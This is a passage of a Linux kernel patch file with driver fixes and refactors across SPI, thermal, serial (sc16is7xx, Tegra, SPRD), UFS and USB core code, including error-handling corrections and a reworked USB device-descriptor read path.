+ static bool addr_in_range(void __iomem *base, size_t size, void *addr)
+ {
+-	return base && (addr >= base && addr < base + size);
++	return base && ((void __iomem *)addr >= base && (void __iomem *)addr < base + size);
+ }
+ 
+ /**
+diff --git a/drivers/spi/spi-tegra20-sflash.c b/drivers/spi/spi-tegra20-sflash.c
+index 220ee08c4a06c..d4bebb4314172 100644
+--- a/drivers/spi/spi-tegra20-sflash.c
++++ b/drivers/spi/spi-tegra20-sflash.c
+@@ -455,7 +455,11 @@ static int tegra_sflash_probe(struct platform_device *pdev)
+ 		goto exit_free_master;
+ 	}
+ 
+-	tsd->irq = platform_get_irq(pdev, 0);
++	ret = platform_get_irq(pdev, 0);
++	if (ret < 0)
++		goto exit_free_master;
++	tsd->irq = ret;
++
+ 	ret = request_irq(tsd->irq, tegra_sflash_isr, 0,
+ 			dev_name(&pdev->dev), tsd);
+ 	if (ret < 0) {
+diff --git a/drivers/spi/spi.c b/drivers/spi/spi.c
+index 5f9aedd1f0b65..151fef199c380 100644
+--- a/drivers/spi/spi.c
++++ b/drivers/spi/spi.c
+@@ -4370,6 +4370,11 @@ static int of_spi_notify(struct notifier_block *nb, unsigned long action,
+ 			return NOTIFY_OK;
+ 		}
+ 
++		/*
++		 * Clear the flag before adding the device so that fw_devlink
++		 * doesn't skip adding consumers to this device.
++		 */
++		rd->dn->fwnode.flags &= ~FWNODE_FLAG_NOT_DEVICE;
+ 		spi = of_register_spi_device(ctlr, rd->dn);
+ 		put_device(&ctlr->dev);
+ 
+diff --git a/drivers/staging/fbtft/fb_ili9341.c b/drivers/staging/fbtft/fb_ili9341.c
+index 9ccd0823c3ab3..47e72b87d76d9 100644
+--- a/drivers/staging/fbtft/fb_ili9341.c
++++ b/drivers/staging/fbtft/fb_ili9341.c
+@@ -145,7 +145,7 @@ static struct fbtft_display display = {
+ 	},
+ };
+ 
+-FBTFT_REGISTER_DRIVER(DRVNAME, "ilitek,ili9341", &display);
++FBTFT_REGISTER_SPI_DRIVER(DRVNAME, "ilitek", "ili9341", &display);
+ 
+ MODULE_ALIAS("spi:" DRVNAME);
+ MODULE_ALIAS("platform:" DRVNAME);
+diff --git a/drivers/staging/media/rkvdec/rkvdec.c b/drivers/staging/media/rkvdec/rkvdec.c
+index 82806f198074a..a9bd1e71ea487 100644
+--- a/drivers/staging/media/rkvdec/rkvdec.c
++++ b/drivers/staging/media/rkvdec/rkvdec.c
+@@ -120,7 +120,7 @@ static const struct rkvdec_coded_fmt_desc rkvdec_coded_fmts[] = {
+ 			.max_width = 4096,
+ 			.step_width = 16,
+ 			.min_height = 48,
+-			.max_height = 2304,
++			.max_height = 2560,
+ 			.step_height = 16,
+ 		},
+ 		.ctrls = &rkvdec_h264_ctrls,
+diff --git a/drivers/thermal/thermal_of.c b/drivers/thermal/thermal_of.c
+index aacba30bc10c1..762d1990180bf 100644
+--- a/drivers/thermal/thermal_of.c
++++ b/drivers/thermal/thermal_of.c
+@@ -409,13 +409,13 @@ static int __thermal_of_unbind(struct device_node *map_np, int index, int trip_i
+ 	ret = of_parse_phandle_with_args(map_np, "cooling-device", "#cooling-cells",
+ 					 index, &cooling_spec);
+ 
+-	of_node_put(cooling_spec.np);
+-
+ 	if (ret < 0) {
+ 		pr_err("Invalid cooling-device entry\n");
+ 		return ret;
+ 	}
+ 
++	of_node_put(cooling_spec.np);
++
+ 	if (cooling_spec.args_count < 2) {
+ 		pr_err("wrong reference to cooling device, missing limits\n");
+ 		return -EINVAL;
+@@ -442,13 +442,13 @@ static int __thermal_of_bind(struct device_node *map_np, int index, int trip_id,
+ 	ret = of_parse_phandle_with_args(map_np, "cooling-device", "#cooling-cells",
+ 					 index, &cooling_spec);
+ 
+-	of_node_put(cooling_spec.np);
+-
+ 	if (ret < 0) {
+ 		pr_err("Invalid cooling-device entry\n");
+ 		return ret;
+ 	}
+ 
++	of_node_put(cooling_spec.np);
++
+ 	if (cooling_spec.args_count < 2) {
+ 		pr_err("wrong reference to cooling device, missing limits\n");
+ 		return -EINVAL;
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index 8411a0f312db0..21145eb8f2a9c 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -236,7 +236,8 @@
+ 
+ /* IOControl register bits (Only 750/760) */
+ #define SC16IS7XX_IOCONTROL_LATCH_BIT	(1 << 0) /* Enable input latching */
+-#define SC16IS7XX_IOCONTROL_MODEM_BIT	(1 << 1) /* Enable GPIO[7:4] as modem pins */
++#define SC16IS7XX_IOCONTROL_MODEM_A_BIT	(1 << 1) /* Enable GPIO[7:4] as modem A pins */
++#define SC16IS7XX_IOCONTROL_MODEM_B_BIT	(1 << 2) /* Enable GPIO[3:0] as modem B pins */
+ #define SC16IS7XX_IOCONTROL_SRESET_BIT	(1 << 3) /* Software Reset */
+ 
+ /* EFCR register bits */
+@@ -301,12 +302,12 @@
+ /* Misc definitions */
+ #define SC16IS7XX_FIFO_SIZE		(64)
+ #define SC16IS7XX_REG_SHIFT		2
++#define SC16IS7XX_GPIOS_PER_BANK	4
+ 
+ struct sc16is7xx_devtype {
+ 	char	name[10];
+ 	int	nr_gpio;
+ 	int	nr_uart;
+-	int	has_mctrl;
+ };
+ 
+ #define SC16IS7XX_RECONF_MD		(1 << 0)
+@@ -336,7 +337,9 @@ struct sc16is7xx_port {
+ 	struct clk			*clk;
+ #ifdef CONFIG_GPIOLIB
+ 	struct gpio_chip		gpio;
++	unsigned long			gpio_valid_mask;
+ #endif
++	u8				mctrl_mask;
+ 	unsigned char			buf[SC16IS7XX_FIFO_SIZE];
+ 	struct kthread_worker		kworker;
+ 	struct task_struct		*kworker_task;
+@@ -447,35 +450,30 @@ static const struct sc16is7xx_devtype sc16is74x_devtype = {
+ 	.name		= "SC16IS74X",
+ 	.nr_gpio	= 0,
+ 	.nr_uart	= 1,
+-	.has_mctrl	= 0,
+ };
+ 
+ static const struct sc16is7xx_devtype sc16is750_devtype = {
+ 	.name		= "SC16IS750",
+-	.nr_gpio	= 4,
++	.nr_gpio	= 8,
+ 	.nr_uart	= 1,
+-	.has_mctrl	= 1,
+ };
+ 
+ static const struct sc16is7xx_devtype sc16is752_devtype = {
+ 	.name		= "SC16IS752",
+-	.nr_gpio	= 0,
++	.nr_gpio	= 8,
+ 	.nr_uart	= 2,
+-	.has_mctrl	= 1,
+ };
+ 
+ static const struct sc16is7xx_devtype sc16is760_devtype = {
+ 	.name		= "SC16IS760",
+-	.nr_gpio	= 4,
++	.nr_gpio	= 8,
+ 	.nr_uart	= 1,
+-	.has_mctrl	= 1,
+ };
+ 
+ static const struct sc16is7xx_devtype sc16is762_devtype = {
+ 	.name		= "SC16IS762",
+-	.nr_gpio	= 0,
++	.nr_gpio	= 8,
+ 	.nr_uart	= 2,
+-	.has_mctrl	= 1,
+ };
+ 
+ static bool sc16is7xx_regmap_volatile(struct device *dev, unsigned int reg)
+@@ -1360,8 +1358,98 @@ static int sc16is7xx_gpio_direction_output(struct gpio_chip *chip,
+ 
+ 	return 0;
+ }
++
++static int sc16is7xx_gpio_init_valid_mask(struct gpio_chip *chip,
++					  unsigned long *valid_mask,
++					  unsigned int ngpios)
++{
++	struct sc16is7xx_port *s = gpiochip_get_data(chip);
++
++	*valid_mask = s->gpio_valid_mask;
++
++	return 0;
++}
++
++static int sc16is7xx_setup_gpio_chip(struct sc16is7xx_port *s)
++{
++	struct device *dev = s->p[0].port.dev;
++
++	if (!s->devtype->nr_gpio)
++		return 0;
++
++	switch (s->mctrl_mask) {
++	case 0:
++		s->gpio_valid_mask = GENMASK(7, 0);
++		break;
++	case SC16IS7XX_IOCONTROL_MODEM_A_BIT:
++		s->gpio_valid_mask = GENMASK(3, 0);
++		break;
++	case SC16IS7XX_IOCONTROL_MODEM_B_BIT:
++		s->gpio_valid_mask = GENMASK(7, 4);
++		break;
++	default:
++		break;
++	}
++
++	if (s->gpio_valid_mask == 0)
++		return 0;
++
++	s->gpio.owner		 = THIS_MODULE;
++	s->gpio.parent		 = dev;
++	s->gpio.label		 = dev_name(dev);
++	s->gpio.init_valid_mask	 = sc16is7xx_gpio_init_valid_mask;
++	s->gpio.direction_input	 = sc16is7xx_gpio_direction_input;
++	s->gpio.get		 = sc16is7xx_gpio_get;
++	s->gpio.direction_output = sc16is7xx_gpio_direction_output;
++	s->gpio.set		 = sc16is7xx_gpio_set;
++	s->gpio.base		 = -1;
++	s->gpio.ngpio		 = s->devtype->nr_gpio;
++	s->gpio.can_sleep	 = 1;
++
++	return gpiochip_add_data(&s->gpio, s);
++}
+ #endif
+ 
++/*
++ * Configure ports designated to operate as modem control lines.
++ */
++static int sc16is7xx_setup_mctrl_ports(struct sc16is7xx_port *s)
++{
++	int i;
++	int ret;
++	int count;
++	u32 mctrl_port[2];
++	struct device *dev = s->p[0].port.dev;
++
++	count = device_property_count_u32(dev, "nxp,modem-control-line-ports");
++	if (count < 0 || count > ARRAY_SIZE(mctrl_port))
++		return 0;
++
++	ret = device_property_read_u32_array(dev, "nxp,modem-control-line-ports",
++					     mctrl_port, count);
++	if (ret)
++		return ret;
++
++	s->mctrl_mask = 0;
++
++	for (i = 0; i < count; i++) {
++		/* Use GPIO lines as modem control lines */
++		if (mctrl_port[i] == 0)
++			s->mctrl_mask |= SC16IS7XX_IOCONTROL_MODEM_A_BIT;
++		else if (mctrl_port[i] == 1)
++			s->mctrl_mask |= SC16IS7XX_IOCONTROL_MODEM_B_BIT;
++	}
++
++	if (s->mctrl_mask)
++		regmap_update_bits(
++			s->regmap,
++			SC16IS7XX_IOCONTROL_REG << SC16IS7XX_REG_SHIFT,
++			SC16IS7XX_IOCONTROL_MODEM_A_BIT |
++			SC16IS7XX_IOCONTROL_MODEM_B_BIT, s->mctrl_mask);
++
++	return 0;
++}
++
+ static const struct serial_rs485 sc16is7xx_rs485_supported = {
+ 	.flags = SER_RS485_ENABLED | SER_RS485_RTS_AFTER_SEND,
+ 	.delay_rts_before_send = 1,
+@@ -1474,12 +1562,6 @@ static int sc16is7xx_probe(struct device *dev,
+ 				     SC16IS7XX_EFCR_RXDISABLE_BIT |
+ 				     SC16IS7XX_EFCR_TXDISABLE_BIT);
+ 
+-		/* Use GPIO lines as modem status registers */
+-		if (devtype->has_mctrl)
+-			sc16is7xx_port_write(&s->p[i].port,
+-					     SC16IS7XX_IOCONTROL_REG,
+-					     SC16IS7XX_IOCONTROL_MODEM_BIT);
+-
+ 		/* Initialize kthread work structs */
+ 		kthread_init_work(&s->p[i].tx_work, sc16is7xx_tx_proc);
+ 		kthread_init_work(&s->p[i].reg_work, sc16is7xx_reg_proc);
+@@ -1517,23 +1599,14 @@ static int sc16is7xx_probe(struct device *dev,
+ 				s->p[u].irda_mode = true;
+ 	}
+ 
++	ret = sc16is7xx_setup_mctrl_ports(s);
++	if (ret)
++		goto out_ports;
++
+ #ifdef CONFIG_GPIOLIB
+-	if (devtype->nr_gpio) {
+-		/* Setup GPIO cotroller */
+-		s->gpio.owner		 = THIS_MODULE;
+-		s->gpio.parent		 = dev;
+-		s->gpio.label		 = dev_name(dev);
+-		s->gpio.direction_input	 = sc16is7xx_gpio_direction_input;
+-		s->gpio.get		 = sc16is7xx_gpio_get;
+-		s->gpio.direction_output = sc16is7xx_gpio_direction_output;
+-		s->gpio.set		 = sc16is7xx_gpio_set;
+-		s->gpio.base		 = -1;
+-		s->gpio.ngpio		 = devtype->nr_gpio;
+-		s->gpio.can_sleep	 = 1;
+-		ret = gpiochip_add_data(&s->gpio, s);
+-		if (ret)
+-			goto out_thread;
+-	}
++	ret = sc16is7xx_setup_gpio_chip(s);
++	if (ret)
++		goto out_ports;
+ #endif
+ 
+ 	/*
+@@ -1556,10 +1629,8 @@ static int sc16is7xx_probe(struct device *dev,
+ 		return 0;
+ 
+ #ifdef CONFIG_GPIOLIB
+-	if (devtype->nr_gpio)
++	if (s->gpio_valid_mask)
+ 		gpiochip_remove(&s->gpio);
+-
+-out_thread:
+ #endif
+ 
+ out_ports:
+@@ -1582,7 +1653,7 @@ static void sc16is7xx_remove(struct device *dev)
+ 	int i;
+ 
+ #ifdef CONFIG_GPIOLIB
+-	if (s->devtype->nr_gpio)
++	if (s->gpio_valid_mask)
+ 		gpiochip_remove(&s->gpio);
+ #endif
+ 
+diff --git a/drivers/tty/serial/serial-tegra.c b/drivers/tty/serial/serial-tegra.c
+index c08360212aa20..7aa2b5b67001d 100644
+--- a/drivers/tty/serial/serial-tegra.c
++++ b/drivers/tty/serial/serial-tegra.c
+@@ -999,7 +999,11 @@ static int tegra_uart_hw_init(struct tegra_uart_port *tup)
+ 	tup->ier_shadow = 0;
+ 	tup->current_baud = 0;
+ 
+-	clk_prepare_enable(tup->uart_clk);
++	ret = clk_prepare_enable(tup->uart_clk);
++	if (ret) {
++		dev_err(tup->uport.dev, "could not enable clk\n");
++		return ret;
++	}
+ 
+ 	/* Reset the UART controller to clear all previous status.*/
+ 	reset_control_assert(tup->rst);
+diff --git a/drivers/tty/serial/sprd_serial.c b/drivers/tty/serial/sprd_serial.c
+index 342a879676315..9c7f71993e945 100644
+--- a/drivers/tty/serial/sprd_serial.c
++++ b/drivers/tty/serial/sprd_serial.c
+@@ -367,7 +367,7 @@ static void sprd_rx_free_buf(struct sprd_uart_port *sp)
+ 	if (sp->rx_dma.virt)
+ 		dma_free_coherent(sp->port.dev, SPRD_UART_RX_SIZE,
+ 				  sp->rx_dma.virt, sp->rx_dma.phys_addr);
+-
++	sp->rx_dma.virt = NULL;
+ }
+ 
+ static int sprd_rx_dma_config(struct uart_port *port, u32 burst)
+@@ -1132,7 +1132,7 @@ static bool sprd_uart_is_console(struct uart_port *uport)
+ static int sprd_clk_init(struct uart_port *uport)
+ {
+ 	struct clk *clk_uart, *clk_parent;
+-	struct sprd_uart_port *u = sprd_port[uport->line];
++	struct sprd_uart_port *u = container_of(uport, struct sprd_uart_port, port);
+ 
+ 	clk_uart = devm_clk_get(uport->dev, "uart");
+ 	if (IS_ERR(clk_uart)) {
+@@ -1175,22 +1175,22 @@ static int sprd_probe(struct platform_device *pdev)
+ {
+ 	struct resource *res;
+ 	struct uart_port *up;
++	struct sprd_uart_port *sport;
+ 	int irq;
+ 	int index;
+ 	int ret;
+ 
+ 	index = of_alias_get_id(pdev->dev.of_node, "serial");
+-	if (index < 0 || index >= ARRAY_SIZE(sprd_port)) {
++	if (index < 0 || index >= UART_NR_MAX) {
+ 		dev_err(&pdev->dev, "got a wrong serial alias id %d\n", index);
+ 		return -EINVAL;
+ 	}
+ 
+-	sprd_port[index] = devm_kzalloc(&pdev->dev, sizeof(*sprd_port[index]),
+-					GFP_KERNEL);
+-	if (!sprd_port[index])
++	sport = devm_kzalloc(&pdev->dev, sizeof(*sport), GFP_KERNEL);
++	if (!sport)
+ 		return -ENOMEM;
+ 
+-	up = &sprd_port[index]->port;
++	up = &sport->port;
+ 	up->dev = &pdev->dev;
+ 	up->line = index;
+ 	up->type = PORT_SPRD;
+@@ -1221,7 +1221,7 @@ static int sprd_probe(struct platform_device *pdev)
+ 	 * Allocate one dma buffer to prepare for receive transfer, in case
+ 	 * memory allocation failure at runtime.
+ 	 */
+-	ret = sprd_rx_alloc_buf(sprd_port[index]);
++	ret = sprd_rx_alloc_buf(sport);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1229,17 +1229,27 @@ static int sprd_probe(struct platform_device *pdev)
+ 		ret = uart_register_driver(&sprd_uart_driver);
+ 		if (ret < 0) {
+ 			pr_err("Failed to register SPRD-UART driver\n");
+-			return ret;
++			goto free_rx_buf;
+ 		}
+ 	}
++
+ 	sprd_ports_num++;
++	sprd_port[index] = sport;
+ 
+ 	ret = uart_add_one_port(&sprd_uart_driver, up);
+ 	if (ret)
+-		sprd_remove(pdev);
++		goto clean_port;
+ 
+ 	platform_set_drvdata(pdev, up);
+ 
++	return 0;
++
++clean_port:
++	sprd_port[index] = NULL;
++	if (--sprd_ports_num == 0)
++		uart_unregister_driver(&sprd_uart_driver);
++free_rx_buf:
++	sprd_rx_free_buf(sport);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 977bd4b9dd0b4..36437d39b93c8 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -8830,9 +8830,11 @@ static int ufshcd_set_dev_pwr_mode(struct ufs_hba *hba,
+ 	for (retries = 3; retries > 0; --retries) {
+ 		ret = scsi_execute(sdp, cmd, DMA_NONE, NULL, 0, NULL, &sshdr,
+ 				   HZ, 0, 0, RQF_PM, NULL);
+-		if (!scsi_status_is_check_condition(ret) ||
+-				!scsi_sense_valid(&sshdr) ||
+-				sshdr.sense_key != UNIT_ATTENTION)
++		/*
++		 * scsi_execute() only returns a negative value if the request
++		 * queue is dying.
++		 */
++		if (ret <= 0)
+ 			break;
+ 	}
+ 	if (ret) {
+diff --git a/drivers/usb/core/hcd.c b/drivers/usb/core/hcd.c
+index 8300baedafd20..6af0a31ff1475 100644
+--- a/drivers/usb/core/hcd.c
++++ b/drivers/usb/core/hcd.c
+@@ -983,6 +983,7 @@ static int register_root_hub(struct usb_hcd *hcd)
+ {
+ 	struct device *parent_dev = hcd->self.controller;
+ 	struct usb_device *usb_dev = hcd->self.root_hub;
++	struct usb_device_descriptor *descr;
+ 	const int devnum = 1;
+ 	int retval;
+ 
+@@ -994,13 +995,16 @@ static int register_root_hub(struct usb_hcd *hcd)
+ 	mutex_lock(&usb_bus_idr_lock);
+ 
+ 	usb_dev->ep0.desc.wMaxPacketSize = cpu_to_le16(64);
+-	retval = usb_get_device_descriptor(usb_dev, USB_DT_DEVICE_SIZE);
+-	if (retval != sizeof usb_dev->descriptor) {
++	descr = usb_get_device_descriptor(usb_dev);
++	if (IS_ERR(descr)) {
++		retval = PTR_ERR(descr);
+ 		mutex_unlock(&usb_bus_idr_lock);
+ 		dev_dbg (parent_dev, "can't read %s device descriptor %d\n",
+ 				dev_name(&usb_dev->dev), retval);
+-		return (retval < 0) ? retval : -EMSGSIZE;
++		return retval;
+ 	}
++	usb_dev->descriptor = *descr;
++	kfree(descr);
+ 
+ 	if (le16_to_cpu(usb_dev->descriptor.bcdUSB) >= 0x0201) {
+ 		retval = usb_get_bos_descriptor(usb_dev);
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index 1abe43ddb75f0..0069a24bd216c 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -2656,12 +2656,17 @@ int usb_authorize_device(struct usb_device *usb_dev)
+ 	}
+ 
+ 	if (usb_dev->wusb) {
+-		result = usb_get_device_descriptor(usb_dev, sizeof(usb_dev->descriptor));
+-		if (result < 0) {
++		struct usb_device_descriptor *descr;
++
++		descr = usb_get_device_descriptor(usb_dev);
++		if (IS_ERR(descr)) {
++			result = PTR_ERR(descr);
+ 			dev_err(&usb_dev->dev, "can't re-read device descriptor for "
+ 				"authorization: %d\n", result);
+ 			goto error_device_descriptor;
+ 		}
++		usb_dev->descriptor = *descr;
++		kfree(descr);
+ 	}
+ 
+ 	usb_dev->authorized = 1;
+@@ -4661,6 +4666,67 @@ static int hub_enable_device(struct usb_device *udev)
+ 	return hcd->driver->enable_device(hcd, udev);
+ }
+ 
++/*
++ * Get the bMaxPacketSize0 value during initialization by reading the
++ * device's device descriptor.  Since we don't already know this value,
++ * the transfer is unsafe and it ignores I/O errors, only testing for
++ * reasonable received values.
++ *
++ * For "old scheme" initialization, size will be 8 so we read just the
++ * start of the device descriptor, which should work okay regardless of
++ * the actual bMaxPacketSize0 value.  For "new scheme" initialization,
++ * size will be 64 (and buf will point to a sufficiently large buffer),
++ * which might not be kosher according to the USB spec but it's what
++ * Windows does and what many devices expect.
++ *
++ * Returns: bMaxPacketSize0 or a negative error code.
++ */
++static int get_bMaxPacketSize0(struct usb_device *udev,
++		struct usb_device_descriptor *buf, int size, bool first_time)
++{
++	int i, rc;
++
++	/*
++	 * Retry on all errors; some devices are flakey.
++	 * 255 is for WUSB devices, we actually need to use
++	 * 512 (WUSB1.0[4.8.1]).
++	 */
++	for (i = 0; i < GET_MAXPACKET0_TRIES; ++i) {
++		/* Start with invalid values in case the transfer fails */
++		buf->bDescriptorType = buf->bMaxPacketSize0 = 0;
++		rc = usb_control_msg(udev, usb_rcvaddr0pipe(),
++				USB_REQ_GET_DESCRIPTOR, USB_DIR_IN,
++				USB_DT_DEVICE << 8, 0,
++				buf, size,
++				initial_descriptor_timeout);
++		switch (buf->bMaxPacketSize0) {
++		case 8: case 16: case 32: case 64: case 9:
++			if (buf->bDescriptorType == USB_DT_DEVICE) {
++				rc = buf->bMaxPacketSize0;
++				break;
++			}
++			fallthrough;
++		default:
++			if (rc >= 0)
++				rc = -EPROTO;
++			break;
++		}
++
++		/*
++		 * Some devices time out if they are powered on
++		 * when already connected. They need a second
++		 * reset, so return early. But only on the first
++		 * attempt, lest we get into a time-out/reset loop.
++		 */
++		if (rc > 0 || (rc == -ETIMEDOUT && first_time &&
++				udev->speed > USB_SPEED_FULL))
++			break;
++	}
++	return rc;
++}
++
++#define GET_DESCRIPTOR_BUFSIZE	64
++
+ /* Reset device, (re)assign address, get device descriptor.
+  * Device connection must be stable, no more debouncing needed.
+  * Returns device in USB_STATE_ADDRESS, except on error.
+@@ -4670,10 +4736,17 @@ static int hub_enable_device(struct usb_device *udev)
+  * the port lock.  For a newly detected device that is not accessible
+  * through any global pointers, it's not necessary to lock the device,
+  * but it is still necessary to lock the port.
++ *
++ * For a newly detected device, @dev_descr must be NULL.  The device
++ * descriptor retrieved from the device will then be stored in
++ * @udev->descriptor.  For an already existing device, @dev_descr
++ * must be non-NULL.  The device descriptor will be stored there,
++ * not in @udev->descriptor, because descriptors for registered
++ * devices are meant to be immutable.
+  */
+ static int
+ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+-		int retry_counter)
++		int retry_counter, struct usb_device_descriptor *dev_descr)
+ {
+ 	struct usb_device	*hdev = hub->hdev;
+ 	struct usb_hcd		*hcd = bus_to_hcd(hdev->bus);
+@@ -4685,6 +4758,13 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 	int			devnum = udev->devnum;
+ 	const char		*driver_name;
+ 	bool			do_new_scheme;
++	const bool		initial = !dev_descr;
++	int			maxp0;
++	struct usb_device_descriptor	*buf, *descr;
++
++	buf = kmalloc(GET_DESCRIPTOR_BUFSIZE, GFP_NOIO);
++	if (!buf)
++		return -ENOMEM;
+ 
+ 	/* root hub ports have a slightly longer reset period
+ 	 * (from USB 2.0 spec, section 7.1.7.5)
+@@ -4717,32 +4797,34 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 	}
+ 	oldspeed = udev->speed;
+ 
+-	/* USB 2.0 section 5.5.3 talks about ep0 maxpacket ...
+-	 * it's fixed size except for full speed devices.
+-	 * For Wireless USB devices, ep0 max packet is always 512 (tho
+-	 * reported as 0xff in the device descriptor). WUSB1.0[4.8.1].
+-	 */
+-	switch (udev->speed) {
+-	case USB_SPEED_SUPER_PLUS:
+-	case USB_SPEED_SUPER:
+-	case USB_SPEED_WIRELESS:	/* fixed at 512 */
+-		udev->ep0.desc.wMaxPacketSize = cpu_to_le16(512);
+-		break;
+-	case USB_SPEED_HIGH:		/* fixed at 64 */
+-		udev->ep0.desc.wMaxPacketSize = cpu_to_le16(64);
+-		break;
+-	case USB_SPEED_FULL:		/* 8, 16, 32, or 64 */
+-		/* to determine the ep0 maxpacket size, try to read
+-		 * the device descriptor to get bMaxPacketSize0 and
+-		 * then correct our initial guess.
++	if (initial) {
++		/* USB 2.0 section 5.5.3 talks about ep0 maxpacket ...
++		 * it's fixed size except for full speed devices.
++		 * For Wireless USB devices, ep0 max packet is always 512 (tho
++		 * reported as 0xff in the device descriptor). WUSB1.0[4.8.1].
+ 		 */
+-		udev->ep0.desc.wMaxPacketSize = cpu_to_le16(64);
+-		break;
+-	case USB_SPEED_LOW:		/* fixed at 8 */
+-		udev->ep0.desc.wMaxPacketSize = cpu_to_le16(8);
+-		break;
+-	default:
+-		goto fail;
++		switch (udev->speed) {
++		case USB_SPEED_SUPER_PLUS:
++		case USB_SPEED_SUPER:
++		case USB_SPEED_WIRELESS:	/* fixed at 512 */
++			udev->ep0.desc.wMaxPacketSize = cpu_to_le16(512);
++			break;
++		case USB_SPEED_HIGH:		/* fixed at 64 */
++			udev->ep0.desc.wMaxPacketSize = cpu_to_le16(64);
++			break;
++		case USB_SPEED_FULL:		/* 8, 16, 32, or 64 */
++			/* to determine the ep0 maxpacket size, try to read
++			 * the device descriptor to get bMaxPacketSize0 and
++			 * then correct our initial guess.
++			 */
++			udev->ep0.desc.wMaxPacketSize = cpu_to_le16(64);
++			break;
++		case USB_SPEED_LOW:		/* fixed at 8 */
++			udev->ep0.desc.wMaxPacketSize = cpu_to_le16(8);
++			break;
++		default:
++			goto fail;
++		}
+ 	}
+ 
+ 	if (udev->speed == USB_SPEED_WIRELESS)
+@@ -4765,22 +4847,24 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 	if (udev->speed < USB_SPEED_SUPER)
+ 		dev_info(&udev->dev,
+ 				"%s %s USB device number %d using %s\n",
+-				(udev->config) ? "reset" : "new", speed,
++				(initial ? "new" : "reset"), speed,
+ 				devnum, driver_name);
+ 
+-	/* Set up TT records, if needed  */
+-	if (hdev->tt) {
+-		udev->tt = hdev->tt;
+-		udev->ttport = hdev->ttport;
+-	} else if (udev->speed != USB_SPEED_HIGH
+-			&& hdev->speed == USB_SPEED_HIGH) {
+-		if (!hub->tt.hub) {
+-			dev_err(&udev->dev, "parent hub has no TT\n");
+-			retval = -EINVAL;
+-			goto fail;
++	if (initial) {
++		/* Set up TT records, if needed  */
++		if (hdev->tt) {
++			udev->tt = hdev->tt;
++			udev->ttport = hdev->ttport;
++		} else if (udev->speed != USB_SPEED_HIGH
++				&& hdev->speed == USB_SPEED_HIGH) {
++			if (!hub->tt.hub) {
++				dev_err(&udev->dev, "parent hub has no TT\n");
++				retval = -EINVAL;
++				goto fail;
++			}
++			udev->tt = &hub->tt;
++			udev->ttport = port1;
+ 		}
+-		udev->tt = &hub->tt;
+-		udev->ttport = port1;
+ 	}
+ 
+ 	/* Why interleave GET_DESCRIPTOR and SET_ADDRESS this way?
+@@ -4799,9 +4883,6 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 
+ 	for (retries = 0; retries < GET_DESCRIPTOR_TRIES; (++retries, msleep(100))) {
+ 		if (do_new_scheme) {
+-			struct usb_device_descriptor *buf;
+-			int r = 0;
+-
+ 			retval = hub_enable_device(udev);
+ 			if (retval < 0) {
+ 				dev_err(&udev->dev,
+@@ -4810,52 +4891,14 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 				goto fail;
+ 			}
+ 
+-#define GET_DESCRIPTOR_BUFSIZE	64
+-			buf = kmalloc(GET_DESCRIPTOR_BUFSIZE, GFP_NOIO);
+-			if (!buf) {
+-				retval = -ENOMEM;
+-				continue;
+-			}
+-
+-			/* Retry on all errors; some devices are flakey.
+-			 * 255 is for WUSB devices, we actually need to use
+-			 * 512 (WUSB1.0[4.8.1]).
+-			 */
+-			for (operations = 0; operations < GET_MAXPACKET0_TRIES;
+-					++operations) {
+-				buf->bMaxPacketSize0 = 0;
+-				r = usb_control_msg(udev, usb_rcvaddr0pipe(),
+-					USB_REQ_GET_DESCRIPTOR, USB_DIR_IN,
+-					USB_DT_DEVICE << 8, 0,
+-					buf, GET_DESCRIPTOR_BUFSIZE,
+-					initial_descriptor_timeout);
+-				switch (buf->bMaxPacketSize0) {
+-				case 8: case 16: case 32: case 64: case 255:
+-					if (buf->bDescriptorType ==
+-							USB_DT_DEVICE) {
+-						r = 0;
+-						break;
+-					}
+-					fallthrough;
+-				default:
+-					if (r == 0)
+-						r = -EPROTO;
+-					break;
+-				}
+-				/*
+-				 * Some devices time out if they are powered on
+-				 * when already connected. They need a second
+-				 * reset. But only on the first attempt,
+-				 * lest we get into a time out/reset loop
+-				 */
+-				if (r == 0 || (r == -ETIMEDOUT &&
+-						retries == 0 &&
+-						udev->speed > USB_SPEED_FULL))
+-					break;
++			maxp0 = get_bMaxPacketSize0(udev, buf,
++					GET_DESCRIPTOR_BUFSIZE, retries == 0);
++			if (maxp0 > 0 && !initial &&
++					maxp0 != udev->descriptor.bMaxPacketSize0) {
++				dev_err(&udev->dev, "device reset changed ep0 maxpacket size!\n");
++				retval = -ENODEV;
++				goto fail;
+ 			}
+-			udev->descriptor.bMaxPacketSize0 =
+-					buf->bMaxPacketSize0;
+-			kfree(buf);
+ 
+ 			retval = hub_port_reset(hub, port1, udev, delay, false);
+ 			if (retval < 0)		/* error or disconnect */
+@@ -4866,14 +4909,13 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 				retval = -ENODEV;
+ 				goto fail;
+ 			}
+-			if (r) {
+-				if (r != -ENODEV)
++			if (maxp0 < 0) {
++				if (maxp0 != -ENODEV)
+ 					dev_err(&udev->dev, "device descriptor read/64, error %d\n",
+-							r);
+-				retval = -EMSGSIZE;
++							maxp0);
++				retval = maxp0;
+ 				continue;
+ 			}
+-#undef GET_DESCRIPTOR_BUFSIZE
+ 		}
+ 
+ 		/*
+@@ -4919,18 +4961,22 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 				break;
+ 		}
+ 
+-		retval = usb_get_device_descriptor(udev, 8);
+-		if (retval < 8) {
++		/* !do_new_scheme || wusb */
